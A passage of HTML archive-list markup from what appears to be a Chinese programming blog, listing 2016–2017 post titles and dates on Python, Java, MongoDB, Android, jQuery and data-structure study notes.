href="/2017/12/17/Python/Python-%E8%A7%A3%E6%9E%90-JSON/"
data-tag="Python"
data-author="" >
<span class="post-title" title="Python 解析 JSON">Python 解析 JSON</span>
<span class="post-date" title="2017-12-17 22:03:27">2017/12/17</span>
</a>
<a class="Python "
href="/2017/12/17/Python/PIL-%E5%9F%BA%E6%9C%AC%E7%94%A8%E6%B3%95/"
data-tag="Python"
data-author="" >
<span class="post-title" title="PIL 基本用法">PIL 基本用法</span>
<span class="post-date" title="2017-12-17 17:57:22">2017/12/17</span>
</a>
<a class="Java "
href="/2017/12/17/Java/CentOS%E4%B8%8B%E5%AE%89%E8%A3%85JDK/"
data-tag="Java"
data-author="" >
<span class="post-title" title="CentOS 下安装 JDK">CentOS 下安装 JDK</span>
<span class="post-date" title="2017-12-17 15:19:51">2017/12/17</span>
</a>
<a class="工具 "
href="/2017/12/17/Git-%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
data-tag="Git"
data-author="" >
<span class="post-title" title="Git 学习笔记">Git 学习笔记</span>
<span class="post-date" title="2017-12-17 15:19:51">2017/12/17</span>
</a>
<a class="数据结构 "
href="/2017/12/09/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B008-%E4%BA%8C%E5%8F%89%E6%A0%912/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记08-二叉树<下篇>">《大话数据结构》笔记08-二叉树<下篇></span>
<span class="post-date" title="2017-12-09 21:34:34">2017/12/09</span>
</a>
<a class="数据结构 "
href="/2017/11/09/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B007-%E4%BA%8C%E5%8F%89%E6%A0%91/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记07-二叉树<上篇>">《大话数据结构》笔记07-二叉树<上篇></span>
<span class="post-date" title="2017-11-09 21:34:34">2017/11/09</span>
</a>
<a class="前端 "
href="/2017/10/13/JavaScript/JavaScript%E5%AE%9E%E7%8E%B0%E5%A4%8D%E5%88%B6%E5%88%B0%E5%89%AA%E8%B4%B4%E6%9D%BF%E5%8A%9F%E8%83%BD/"
data-tag="JavaScript"
data-author="" >
<span class="post-title" title="JavaScript实现复制到剪贴板功能">JavaScript实现复制到剪贴板功能</span>
<span class="post-date" title="2017-10-13 14:49:58">2017/10/13</span>
</a>
<a class="前端 "
href="/2017/10/01/JavaScript/jQuery%E6%93%8D%E4%BD%9Cselect%E7%9A%84%E6%96%B9%E6%B3%95/"
data-tag="JavaScript,jQuery"
data-author="" >
<span class="post-title" title="jQuery操作select的方法">jQuery操作select的方法</span>
<span class="post-date" title="2017-10-01 21:49:58">2017/10/01</span>
</a>
<a class="前端 "
href="/2017/10/01/JavaScript/jQuery%E6%93%8D%E4%BD%9Ccheckbox%E7%9A%84%E6%96%B9%E6%B3%95/"
data-tag="JavaScript,jQuery"
data-author="" >
<span class="post-title" title="jQuery操作checkbox的方法">jQuery操作checkbox的方法</span>
<span class="post-date" title="2017-10-01 12:28:31">2017/10/01</span>
</a>
<a class="前端 "
href="/2017/09/28/JavaScript/jQuery%E6%93%8D%E4%BD%9Cradio%E7%9A%84%E6%96%B9%E6%B3%95/"
data-tag="JavaScript,jQuery"
data-author="" >
<span class="post-title" title="jQuery操作radio的方法">jQuery操作radio的方法</span>
<span class="post-date" title="2017-09-28 15:44:05">2017/09/28</span>
</a>
<a class="工具 "
href="/2017/09/13/Hexo%E4%BD%BF%E7%94%A8%E8%AE%B0%E5%BD%95/"
data-tag="Hexo"
data-author="" >
<span class="post-title" title="Hexo使用记录">Hexo使用记录</span>
<span class="post-date" title="2017-09-13 16:07:14">2017/09/13</span>
</a>
<a class="数据结构 "
href="/2017/09/09/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B006-%E6%A0%91/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记06-树">《大话数据结构》笔记06-树</span>
<span class="post-date" title="2017-09-09 21:34:34">2017/09/09</span>
</a>
<a class="数据结构 "
href="/2017/09/09/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B005-%E4%B8%B2/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记05-串">《大话数据结构》笔记05-串</span>
<span class="post-date" title="2017-09-09 21:06:25">2017/09/09</span>
</a>
<a class="数据结构 "
href="/2017/09/09/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B004-%E6%A0%88%E4%B8%8E%E9%98%9F%E5%88%97/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记04-栈与队列">《大话数据结构》笔记04-栈与队列</span>
<span class="post-date" title="2017-09-09 20:50:06">2017/09/09</span>
</a>
<a class="数据结构 "
href="/2017/09/04/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B003-%E7%BA%BF%E6%80%A7%E8%A1%A8/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记03-线性表">《大话数据结构》笔记03-线性表</span>
<span class="post-date" title="2017-09-04 21:58:20">2017/09/04</span>
</a>
<a class="数据结构 "
href="/2017/09/04/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B002-%E7%AE%97%E6%B3%95/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记02-算法">《大话数据结构》笔记02-算法</span>
<span class="post-date" title="2017-09-04 21:33:31">2017/09/04</span>
</a>
<a class="数据结构 "
href="/2017/09/04/%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/%E3%80%8A%E5%A4%A7%E8%AF%9D%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E3%80%8B%E7%AC%94%E8%AE%B001-%E7%BB%AA%E8%AE%BA/"
data-tag="数据结构,大话数据结构"
data-author="" >
<span class="post-title" title="《大话数据结构》笔记01-绪论">《大话数据结构》笔记01-绪论</span>
<span class="post-date" title="2017-09-04 21:06:05">2017/09/04</span>
</a>
<a class="Java "
href="/2017/08/05/Spring/SpringMVC-MongoDB%E6%95%B4%E5%90%88%E4%B8%AD%E9%81%87%E5%88%B0%E7%9A%84%E9%97%AE%E9%A2%98/"
data-tag="Java,MongoDB,Spring"
data-author="" >
<span class="post-title" title="SpringMVC MongoDB整合中遇到的问题">SpringMVC MongoDB整合中遇到的问题</span>
<span class="post-date" title="2017-08-05 07:54:05">2017/08/05</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B013-MongoDB%E5%A4%87%E4%BB%BD/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记13-MongoDB备份">MongoDB学习笔记13-MongoDB备份</span>
<span class="post-date" title="2017-07-17 23:21:37">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B012-MongoDB%E8%81%9A%E5%90%88/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记12-MongoDB聚合">MongoDB学习笔记12-MongoDB聚合</span>
<span class="post-date" title="2017-07-17 22:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B011-MongoDB%E7%B4%A2%E5%BC%95/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记11-MongoDB索引">MongoDB学习笔记11-MongoDB索引</span>
<span class="post-date" title="2017-07-17 21:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B010-MongoDB%E5%88%86%E9%A1%B5%E3%80%81%E6%8E%92%E5%BA%8F%E4%B8%8E%E6%B8%B8%E6%A0%87/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记10-MongoDB分页、排序与游标">MongoDB学习笔记10-MongoDB分页、排序与游标</span>
<span class="post-date" title="2017-07-17 20:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B009-MongoDB%E5%9C%A8Shell%E4%B8%AD%E6%89%A7%E8%A1%8C%E6%9F%A5%E8%AF%A2/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记09-MongoDB在Shell中执行查询">MongoDB学习笔记09-MongoDB在Shell中执行查询</span>
<span class="post-date" title="2017-07-17 19:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B008-MongoDB%E5%9C%A8Shell%E4%B8%AD%E6%89%A7%E8%A1%8C%E5%88%A0%E9%99%A4/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记08-MongoDB在Shell中执行删除">MongoDB学习笔记08-MongoDB在Shell中执行删除</span>
<span class="post-date" title="2017-07-17 18:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B007-MongoDB%E5%9C%A8Shell%E4%B8%AD%E6%89%A7%E8%A1%8C%E6%9B%B4%E6%96%B0/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记07-MongoDB在Shell中执行更新">MongoDB学习笔记07-MongoDB在Shell中执行更新</span>
<span class="post-date" title="2017-07-17 17:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B006-MongoDB%E5%9C%A8Shell%E4%B8%AD%E6%89%A7%E8%A1%8C%E5%A2%9E/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记06-MongoDB在Shell中执行增">MongoDB学习笔记06-MongoDB在Shell中执行增</span>
<span class="post-date" title="2017-07-17 16:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B005-Shell%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记05-Shell常用命令">MongoDB学习笔记05-Shell常用命令</span>
<span class="post-date" title="2017-07-17 15:21:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B004-MySQL%20MongoDB%20%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4%E5%AF%B9%E6%AF%94/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记04-MySQL MongoDB 常用命令对比">MongoDB学习笔记04-MySQL MongoDB 常用命令对比</span>
<span class="post-date" title="2017-07-17 14:51:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B003-MongoDB%20%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%8C%E5%AF%B9%E8%B1%A1%EF%BC%8C%E9%9B%86%E5%90%88/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记03-MongoDB 数据库,对象,集合">MongoDB学习笔记03-MongoDB 数据库,对象,集合</span>
<span class="post-date" title="2017-07-17 14:41:38">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B002-MongoDB%E7%AE%80%E4%BB%8B%E5%8F%8A%E5%AE%89%E8%A3%85/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记02-MongoDB简介及安装">MongoDB学习笔记02-MongoDB简介及安装</span>
<span class="post-date" title="2017-07-17 14:31:32">2017/07/17</span>
</a>
<a class="MongoDB "
href="/2017/07/17/MongoDB/MongoDB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B001-NoSQL/"
data-tag="MongoDB"
data-author="" >
<span class="post-title" title="MongoDB学习笔记01-NoSQL">MongoDB学习笔记01-NoSQL</span>
<span class="post-date" title="2017-07-17 14:21:31">2017/07/17</span>
</a>
<a class="Java "
href="/2017/05/27/%E6%94%AF%E4%BB%98%E5%AE%9DAPP%E6%94%AF%E4%BB%98%E6%8E%A5%E5%8F%A3-Java%E6%9C%8D%E5%8A%A1%E7%AB%AF/"
data-tag="Java,支付宝"
data-author="" >
<span class="post-title" title="支付宝APP支付接口-Java服务端">支付宝APP支付接口-Java服务端</span>
<span class="post-date" title="2017-05-27 22:28:27">2017/05/27</span>
</a>
<a class="Java "
href="/2017/01/01/Java/Jython%E5%AE%89%E8%A3%85%E5%8F%8A%E4%BD%BF%E7%94%A8/"
data-tag="Python,Java"
data-author="" >
<span class="post-title" title="Jython安装及使用">Jython安装及使用</span>
<span class="post-date" title="2017-01-01 22:53:15">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B010-%E6%A8%A1%E5%9D%97%EF%BC%8C%E6%A0%87%E5%87%86%E5%BA%93/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记10-模块,标准库">《Python基础教程》读书笔记10-模块,标准库</span>
<span class="post-date" title="2017-01-01 22:41:44">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B009-%E9%AD%94%E6%B3%95%E6%96%B9%E6%B3%95%E3%80%81%E5%B1%9E%E6%80%A7%E5%92%8C%E8%BF%AD%E4%BB%A3%E5%99%A8/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记09-魔法方法、属性和迭代器">《Python基础教程》读书笔记09-魔法方法、属性和迭代器</span>
<span class="post-date" title="2017-01-01 22:39:34">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B008-%E5%BC%82%E5%B8%B8/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记08-异常">《Python基础教程》读书笔记08-异常</span>
<span class="post-date" title="2017-01-01 22:38:13">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B007-%E6%9B%B4%E5%8A%A0%E6%8A%BD%E8%B1%A1/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记07-更加抽象">《Python基础教程》读书笔记07-更加抽象</span>
<span class="post-date" title="2017-01-01 22:34:51">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B006-%E6%8A%BD%E8%B1%A1/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记06-抽象">《Python基础教程》读书笔记06-抽象</span>
<span class="post-date" title="2017-01-01 22:30:32">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B005-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E8%BF%9B%E9%98%B6/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记05-基础知识进阶">《Python基础教程》读书笔记05-基础知识进阶</span>
<span class="post-date" title="2017-01-01 17:17:55">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B004-%E5%AD%97%E5%85%B8/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记04-字典">《Python基础教程》读书笔记04-字典</span>
<span class="post-date" title="2017-01-01 17:15:28">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B003-%E5%AD%97%E7%AC%A6%E4%B8%B2/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记03-字符串">《Python基础教程》读书笔记03-字符串</span>
<span class="post-date" title="2017-01-01 16:51:21">2017/01/01</span>
</a>
<a class="Python "
href="/2017/01/01/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B002-%E5%88%97%E8%A1%A8%E5%92%8C%E5%85%83%E7%BB%84/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记02-列表和元组">《Python基础教程》读书笔记02-列表和元组</span>
<span class="post-date" title="2017-01-01 16:25:22">2017/01/01</span>
</a>
<a class="Java "
href="/2016/11/06/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B008%EF%BC%9A%E9%81%BF%E5%85%8D%E4%BD%BF%E7%94%A8%20Finalizer%20%E5%92%8C%20Cleaner%20%E6%9C%BA%E5%88%B6/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记08:避免使用 Finalizer 和 Cleaner 机制">《Effective Java》笔记08:避免使用 Finalizer 和 Cleaner 机制</span>
<span class="post-date" title="2016-11-06 23:39:33">2016/11/06</span>
</a>
<a class="Java "
href="/2016/11/04/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B007%EF%BC%9A%E6%B6%88%E9%99%A4%E8%BF%87%E6%9C%9F%E7%9A%84%E5%AF%B9%E8%B1%A1%E5%BC%95%E7%94%A8/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记07:消除过期的对象引用">《Effective Java》笔记07:消除过期的对象引用</span>
<span class="post-date" title="2016-11-04 15:28:51">2016/11/04</span>
</a>
<a class="前端 "
href="/2016/10/30/JavaScript/JavaScript%E5%AE%9E%E7%8E%B0%E9%99%90%E5%88%B6%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6%E7%9A%84%E5%A4%A7%E5%B0%8F/"
data-tag="JavaScript"
data-author="" >
<span class="post-title" title="JavaScript实现限制上传文件的大小">JavaScript实现限制上传文件的大小</span>
<span class="post-date" title="2016-10-30 23:21:58">2016/10/30</span>
</a>
<a class="前端 "
href="/2016/10/30/JavaScript/Prettify-js%E4%BD%BF%E4%BB%A3%E7%A0%81%E9%AB%98%E4%BA%AE/"
data-tag="JavaScript"
data-author="" >
<span class="post-title" title="Prettify.js使代码高亮">Prettify.js使代码高亮</span>
<span class="post-date" title="2016-10-30 21:56:42">2016/10/30</span>
</a>
<a class="前端 "
href="/2016/10/30/JavaScript/JavaScript%E5%88%A4%E6%96%AD%E6%B5%8F%E8%A7%88%E5%99%A8%E7%B1%BB%E5%9E%8B%E5%8F%8A%E7%89%88%E6%9C%AC/"
data-tag="JavaScript"
data-author="" >
<span class="post-title" title="JavaScript判断浏览器类型及版本">JavaScript判断浏览器类型及版本</span>
<span class="post-date" title="2016-10-30 21:06:57">2016/10/30</span>
</a>
<a class="Python "
href="/2016/07/19/Python%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/%E3%80%8APython%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B001-%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B/"
data-tag="Python"
data-author="" >
<span class="post-title" title="《Python基础教程》读书笔记01-基础知识">《Python基础教程》读书笔记01-基础知识</span>
<span class="post-date" title="2016-07-19 19:18:10">2016/07/19</span>
</a>
<a class="Java "
href="/2016/05/27/UTF-8%E7%BC%96%E7%A0%81%E8%A7%84%E5%88%99/"
data-tag="编码,Java"
data-author="" >
<span class="post-title" title="UTF-8编码规则,及对包含汉字的字符串截取指定字节数">UTF-8编码规则,及对包含汉字的字符串截取指定字节数</span>
<span class="post-date" title="2016-05-27 14:26:33">2016/05/27</span>
</a>
<a class="数据库 "
href="/2016/05/26/Java/java-sql-SQLException-Incorrect-string-value-xF0-x9F-x91-xBD-xF0-x9F%E2%80%A6/"
data-tag="Java,MySQL"
data-author="" >
<span class="post-title" title="java.sql.SQLException: Incorrect string value: '\xF0\x9F\x91\xBD\xF0\x9F…'">java.sql.SQLException: Incorrect string value: '\xF0\x9F\x91\xBD\xF0\x9F…'</span>
<span class="post-date" title="2016-05-26 21:52:11">2016/05/26</span>
</a>
<a class="Android "
href="/2016/05/18/Android/%E3%80%8A%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0-%E7%AC%AC%E4%B8%89%E7%AB%A001-%E5%B8%B8%E8%A7%81%E6%8E%A7%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95/"
data-tag="Android,第一行代码"
data-author="" >
<span class="post-title" title="《第一行代码》读书笔记-第三章01 常见控件的使用方法">《第一行代码》读书笔记-第三章01 常见控件的使用方法</span>
<span class="post-date" title="2016-05-18 14:39:21">2016/05/18</span>
</a>
<a class="Android "
href="/2016/05/18/Android/%E3%80%8A%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0-%E7%AC%AC%E4%BA%8C%E7%AB%A005-%E6%B4%BB%E5%8A%A8%E7%9A%84%E6%9C%80%E4%BD%B3%E5%AE%9E%E8%B7%B5/"
data-tag="Android,第一行代码"
data-author="" >
<span class="post-title" title="《第一行代码》读书笔记-第二章05 活动的最佳实践">《第一行代码》读书笔记-第二章05 活动的最佳实践</span>
<span class="post-date" title="2016-05-18 13:31:49">2016/05/18</span>
</a>
<a class="Android "
href="/2016/05/18/Android/ADB%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/"
data-tag="Android"
data-author="" >
<span class="post-title" title="ADB常用命令">ADB常用命令</span>
<span class="post-date" title="2016-05-18 12:45:45">2016/05/18</span>
</a>
<a class="Android "
href="/2016/05/17/Android/Android%E4%BB%BB%E5%8A%A1%E5%92%8C%E8%BF%94%E5%9B%9E%E6%A0%88%E5%AE%8C%E5%85%A8%E8%A7%A3%E6%9E%90%EF%BC%8C%E7%BB%86%E6%95%B0%E9%82%A3%E4%BA%9B%E4%BD%A0%E6%89%80%E4%B8%8D%E7%9F%A5%E9%81%93%E7%9A%84%E7%BB%86%E8%8A%82/"
data-tag="Android"
data-author="" >
<span class="post-title" title="Android任务和返回栈完全解析,细数那些你所不知道的细节">Android任务和返回栈完全解析,细数那些你所不知道的细节</span>
<span class="post-date" title="2016-05-17 16:43:50">2016/05/17</span>
</a>
<a class="Android "
href="/2016/05/14/Android/%E3%80%8A%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0-%E7%AC%AC%E4%BA%8C%E7%AB%A004-%E6%B4%BB%E5%8A%A8%E7%9A%84%E5%90%AF%E5%8A%A8%E6%A8%A1%E5%BC%8F/"
data-tag="Android,第一行代码"
data-author="" >
<span class="post-title" title="《第一行代码》读书笔记-第二章04 活动的启动模式">《第一行代码》读书笔记-第二章04 活动的启动模式</span>
<span class="post-date" title="2016-05-14 13:25:01">2016/05/14</span>
</a>
<a class="Android "
href="/2016/05/14/Android/Parcelable%E6%8E%A5%E5%8F%A3%E7%9A%84%E4%BD%BF%E7%94%A8/"
data-tag="Android"
data-author="" >
<span class="post-title" title="Parcelable接口的使用">Parcelable接口的使用</span>
<span class="post-date" title="2016-05-14 09:49:24">2016/05/14</span>
</a>
<a class="Android "
href="/2016/05/12/Android/%E3%80%8A%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0-%E7%AC%AC%E4%BA%8C%E7%AB%A003-%E6%B4%BB%E5%8A%A8%E7%9A%84%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F/"
data-tag="Android,第一行代码"
data-author="" >
<span class="post-title" title="《第一行代码》读书笔记-第二章03 活动的生命周期">《第一行代码》读书笔记-第二章03 活动的生命周期</span>
<span class="post-date" title="2016-05-12 17:09:54">2016/05/12</span>
</a>
<a class="Android "
href="/2016/05/12/Android/%E3%80%8A%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0-%E7%AC%AC%E4%BA%8C%E7%AB%A002-%E4%BD%BF%E7%94%A8Intent%E5%9C%A8%E6%B4%BB%E5%8A%A8%E4%B9%8B%E9%97%B4%E7%A9%BF%E6%A2%AD/"
data-tag="Android,第一行代码"
data-author="" >
<span class="post-title" title="《第一行代码》读书笔记-第二章02 使用Intent在活动之间穿梭">《第一行代码》读书笔记-第二章02 使用Intent在活动之间穿梭</span>
<span class="post-date" title="2016-05-12 11:00:18">2016/05/12</span>
</a>
<a class="Android "
href="/2016/05/11/Android/%E3%80%8A%E7%AC%AC%E4%B8%80%E8%A1%8C%E4%BB%A3%E7%A0%81%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0-%E7%AC%AC%E4%BA%8C%E7%AB%A001%20%E6%B4%BB%E5%8A%A8%E7%9A%84%E5%9F%BA%E6%9C%AC%E7%94%A8%E6%B3%95/"
data-tag="Android,第一行代码"
data-author="" >
<span class="post-title" title="《第一行代码》读书笔记-第二章01 活动的基本用法">《第一行代码》读书笔记-第二章01 活动的基本用法</span>
<span class="post-date" title="2016-05-11 15:49:08">2016/05/11</span>
</a>
<a class="Java "
href="/2016/05/11/Effective-Java/%E3%80%8AEffective%20Java%E3%80%8B%E7%AC%94%E8%AE%B006%EF%BC%9A%E9%81%BF%E5%85%8D%E5%88%9B%E5%BB%BA%E4%B8%8D%E5%BF%85%E8%A6%81%E7%9A%84%E5%AF%B9%E8%B1%A1/"
data-tag="Java,Effective Java"
data-author="" >
<span class="post-title" title="《Effective Java》笔记06:避免创建不必要的对象">《Effective Java》笔记06:避免创建不必要的对象</span>
<span class="post-date" title="2016-05-11 14:25:57">2016/05/11</span>
</a>
<a class="Android "
